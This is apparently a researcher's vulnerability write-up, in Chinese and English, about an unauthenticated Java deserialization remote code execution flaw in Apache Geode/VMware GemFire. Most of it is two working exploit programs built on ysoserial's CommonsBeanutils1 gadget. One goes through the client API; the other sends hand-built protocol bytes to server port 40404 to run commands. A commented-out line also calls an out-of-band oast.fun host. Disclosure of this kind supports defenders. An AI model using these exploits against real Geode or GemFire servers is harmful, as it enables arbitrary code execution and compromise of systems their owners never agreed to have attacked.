Apache Geode/VMware GemFire Deserialize RCE

官方在文档上加了提示 https://docs.vmware.com/en/VMware-GemFire/10.0/gf/managing-security-hardening-guide.html 公开此漏洞

# Introduction

该漏洞是我在挖掘VMware vROPS产品中发现的反序列化漏洞,但是在VMware vROPS产品中并不能直接利用,因为该产品开启了ssl并且开启了双向认证,必须有ssl的证书才可以反序列化。这里先记录一下未开启ssl的反序列化RCE。

# Vulnerability description

Unauthorized deserialization exists in gemfire, and attackers can construct malicious deserialized data to execute code on the target machine.

# Test environment

vmware-gemfire-9.15.2.tar.gz from https://network.tanzu.vmware.com/products/pivotal-gemfire/

or apache geode from github

# Environment build

1
2
3
.\gfsh.bat
start locator --name=locator1
start server --name=server1

locator port 10334 server port 40404

image.png

# exploit

Import ysoserial-all.jar in dependencies

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
import com.vmware.vcops.platform.api.PlatformException;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.ClientCache;
import org.apache.geode.cache.client.ClientCacheFactory;
import org.apache.geode.cache.client.ClientRegionShortcut;
import ysoserial.payloads.CommonsBeanutils1;

public class Main {
     public static void main(String[] args) throws Exception, PlatformException {
         ClientCache cache = new ClientCacheFactory().addPoolLocator("127.0.0.1", 10334).set("log-level", "NONE").create();
         Region<Object, Object> region = cache.createClientRegionFactory(ClientRegionShortcut.PROXY).create("example");
         Object object = new CommonsBeanutils1().getObject("notepad");
         region. put(object, object);
     }
}

The malicious deserialized object “object” will be deserialized when sent to the server with port 40404, thus executing the notepad command.

image.png

or use this port send serialize data to port 40404

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import ysoserial.Serializer;
import ysoserial.payloads.CommonsBeanutils1;

import java.io.DataOutputStream;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.Socket;

public class SocketTest {
    public static void main(String[] args) throws Exception {
        String host = "192.168.1.166";
        Socket client = new Socket(host, 40404);

        OutputStream outputStream = client.getOutputStream();
        // CommunicationMode 0x64=100=ClientToServer
        outputStream.write(0x64);

        // version 255 0 150
        outputStream.write(0xff);
        outputStream.write(0x0);
        outputStream.write(0x96);

        // valRead REPLY_OK
        outputStream.write(0x3b);

        DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
        // timeout
        dataOutputStream.writeInt(10000);
        // DSCODE SERIALIZABLE
        dataOutputStream.write(0x2c);

        Serializable notepad = (Serializable) new CommonsBeanutils1().getObject("touch /tmp/fuck" + System.currentTimeMillis());
//        Serializable notepad = (Serializable) new URLDNS().getObject("http://" + System.currentTimeMillis() +"."+host+ ".cfj4rxv2vtc0000y0xngg83ncqhyyyyyb.oast.fun");
        dataOutputStream.write(Serializer.serialize(notepad));

        dataOutputStream.flush();
        dataOutputStream.close();
        outputStream.flush();
        outputStream.close();
        client.close();
    }
}

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。